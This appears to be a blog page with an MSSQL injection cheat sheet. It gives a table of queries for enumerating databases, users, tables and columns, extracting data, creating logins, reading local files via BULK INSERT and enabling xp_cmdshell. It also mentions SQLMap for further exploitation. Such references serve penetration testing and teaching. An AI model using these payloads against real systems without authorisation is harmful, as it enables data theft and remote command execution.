After finding the injection point and detecting the exact number of column we can use the following basic queries to show proof of concept for the vulnerability.
Function | Query | Remarks |
Database version | SELECT @@version | |
Host name | SELECT host_name() | |
Current Database | SELECT DB_NAME() | |
Current user | SELECT system_user; SELECT user; SELECT user_name() | |
List Users | SELECT name from master..syslogins | |
List Databases | SELECT name FROM master..sysdatabases; SELECT DB_NAME(*) | * = 1,2,3…. |
Get Tables from current database | Select table_name FROM information_schema.tables; | |
Get Tables from other database | SELECT name FROM other_database..sysobjects WHERE xtype = ‘U’– | |
Get column from current DB’s | SELECT column_name FROM information_schema.columns WHERE table_name = ‘your_table_name’; | |
Get column from other DB’s table | SELECT other_database..syscolumns.name,TYPE_NAME(other_database..syscolumns.xtype) FROM other_database..syscolumns, other_database..sysobjects WHEREother_database..syscolumns.id=other_database..sysobjects.id AND other_database..sysobjects.name=’other_table’ | |
Extract Data | SELECT column_name FROM table_name | |
Extract Data From another database | SELECT other_column_name FROM other_database..other_table | |
Create User | EXEC sp_addlogin ‘user’, ‘pass’; | Privilege |
Location of Database files | EXEC sp_helpdb master; EXEC sp_helpdb pubs; | |
Local File Access | BULK INSERT mydata FROM ‘c:boot.ini’; | |
Command Execution | EXEC sp_configure ‘xp_cmdshell’, 1; | Privilege |
If you want to do further exploitation like extracting data from the database or running OS shell you can use SQLMap tool.
Also Read: SQL Injection Explained From Scratch
[…] Also Read: MSSQL Injection Cheat sheet […]
[…] Also Read: MSSQL Injection Cheat sheet […]